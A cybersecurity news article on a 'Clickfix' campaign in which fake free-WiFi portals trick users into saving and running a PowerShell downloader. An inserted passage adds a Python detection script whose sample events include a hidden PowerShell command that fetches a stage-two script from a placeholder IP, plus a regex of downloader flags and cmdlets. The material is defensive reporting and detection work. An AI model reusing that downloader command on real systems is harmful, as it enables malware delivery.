Cyber Security News

New Clickfix Attack Promises “Free WiFi” But Delivers PowerShell-Based Malware

The Cybersecuritynews researcher team uncovered a sophisticated social engineering campaign that is exploiting the public’s need for free internet access, using deceptive Wi-Fi portals to trick users into downloading and executing PowerShell-based malware.

Dubbed the “Clickfix” attack, this method turns a user’s own browser actions against them to compromise their system under the guise of a simple human verification step.

The attack targets individuals in public spaces such as airports, where the promise of “Free Wi-Fi” is a powerful lure. Unsuspecting users attempting to connect are redirected to a professionally designed but fake captive portal.

Free Wifi Promise (Source: Cybersecuritynews researcher team)

These pages, often served from bare IP addresses rather than legitimate domains, mimic real network login screens, complete with logos and a CAPTCHA prompt to “prove you are not a robot,” a touch intended to create a false sense of legitimacy.

Deceptive Verification Process

The core of the Clickfix attack lies in its clever manipulation of user behavior. After a user interacts with the fake CAPTCHA, a pop-up window appears with a set of “Verification Steps.”

Instead of a simple click, the instructions guide the user through a specific sequence of keyboard shortcuts: press Ctrl+S to save the web page, navigate to the browser’s downloads window, and press Enter to open the file, the Cybersecuritynews researcher team said.

Clickfix popup (Source: Cybersecuritynews researcher team)

This sequence is a social engineering trick designed to bypass standard browser security warnings about downloading executable files.

By instructing the user to save the page and run the file themselves, the attackers effectively get consent to execute malicious code. The downloaded file is not an image or document but a script that initiates the infection.

Once the user unwittingly executes the downloaded file, a malicious PowerShell script is launched.

Analysis of the attack chain with ANY.RUN Sandbox reveals that this script acts as a downloader, establishing a connection to a command-and-control server to fetch the primary malware payload. In this campaign, the payload has been identified as a network trojan.

File execution (Source: Cybersecuritynews researcher team)

PowerShell is a powerful tool for attackers because it is integrated into Windows and can execute commands, scripts, and payloads directly in memory, often evading detection by traditional antivirus solutions.
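The chain described above (a file opened from the browser's Downloads folder spawning a PowerShell downloader) and the earlier advice to inspect portal URLs both lend themselves to simple endpoint-side checks. The following is an added example, not code from the article or from the Cybersecuritynews team: it runs a process-lineage rule over a constructed set of process-creation events in the style of Sysmon Event ID 1, and a URL check for portals served from raw IP addresses or over plain HTTP. The event records, the `mshta.exe` script host, the file name and the 203.0.113.x / 198.51.100.x addresses are all constructed assumptions for the demonstration.

```python
import ipaddress
import re
from typing import Dict, Iterator, List
from urllib.parse import urlsplit

# Constructed process-creation events (Sysmon Event ID 1 style, flattened to
# dicts). Illustrative only; none of this is taken from the article.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"pid": "100", "ppid": "1",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": "chrome.exe"},
    # user "opens the file" from the browser's downloads window (assumed script host)
    {"pid": "200", "ppid": "100",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Users\alice\Downloads\Free WiFi.hta"'},
    # script host launches a hidden PowerShell downloader
    {"pid": "300", "ppid": "200",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c Invoke-WebRequest "
                "http://203.0.113.10/stage2 -OutFile $env:TEMP\\s.ps1"},
    # benign: an operator running a cmdlet from a console
    {"pid": "400", "ppid": "1", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe"},
    {"pid": "500", "ppid": "400",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-Process"},
]

SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
DOWNLOADS_DIR = re.compile(r"\\downloads\\", re.IGNORECASE)
# Flags and cmdlets typical of a PowerShell stage-one downloader.
SUSPICIOUS_PS = re.compile(
    r"-e(nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|-ep\s+bypass|"
    r"executionpolicy\s+bypass|invoke-webrequest|downloadstring|downloadfile|"
    r"\biex\b|invoke-expression",
    re.IGNORECASE,
)


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(event: Dict[str, str], by_pid: Dict[str, Dict[str, str]]) -> Iterator[Dict[str, str]]:
    """Walk the parent chain; the seen-set guards against pid reuse loops."""
    seen = set()
    cur = by_pid.get(event["ppid"])
    while cur is not None and cur["pid"] not in seen:
        seen.add(cur["pid"])
        yield cur
        cur = by_pid.get(cur["ppid"])


def detect_clickfix_chain(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Flag suspicious powershell.exe whose ancestry contains a script host
    that was launched on a file under a Downloads folder."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Dict[str, object]] = []
    for ev in events:
        if basename(ev["image"]) != "powershell.exe":
            continue
        if not SUSPICIOUS_PS.search(ev["cmdline"]):
            continue
        chain = list(ancestors(ev, by_pid))
        host = next((a for a in chain
                     if basename(a["image"]) in SCRIPT_HOSTS
                     and DOWNLOADS_DIR.search(a["cmdline"])), None)
        if host is None:
            continue
        findings.append({
            "pid": ev["pid"],
            "script_host_pid": host["pid"],
            "browser_in_chain": any(basename(a["image"]) in BROWSERS for a in chain),
            "cmdline": ev["cmdline"],
        })
    return findings


def portal_url_is_suspicious(url: str) -> bool:
    """True when a 'login' page is served from a bare IP literal or without TLS."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ipaddress.ip_address(host)
        is_ip_literal = True
    except ValueError:
        is_ip_literal = False
    return is_ip_literal or parts.scheme.lower() != "https"


if __name__ == "__main__":
    for f in detect_clickfix_chain(SAMPLE_EVENTS):
        print("ALERT:", f)
    print(portal_url_is_suspicious("http://198.51.100.7/wifi/login"))
```

The lineage rule keys on the combination (script host opened on a Downloads file, then a hidden or download-capable PowerShell child) rather than on either element alone, which keeps an operator's console PowerShell session out of the alert queue. The URL check is deliberately coarse: many legitimate captive portals still use plain HTTP, so treat it as a prompt for a closer look rather than a verdict.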

This type of fileless malware can be used for a wide range of malicious activities, including stealing sensitive information, deploying ransomware, or providing a persistent backdoor for remote access to the compromised device.

To safeguard against this threat, users should stay alert when connecting to public Wi-Fi, carefully examine the URLs of login pages, and be very cautious of any website that requires unusual keyboard commands for verification.


Guru Baran

Gurubaran is the Co-Founder and Editor-in-Chief of CyberSecurityNews.com, specializing in vulnerability analysis, malware research, ransomware, and computer forensics.
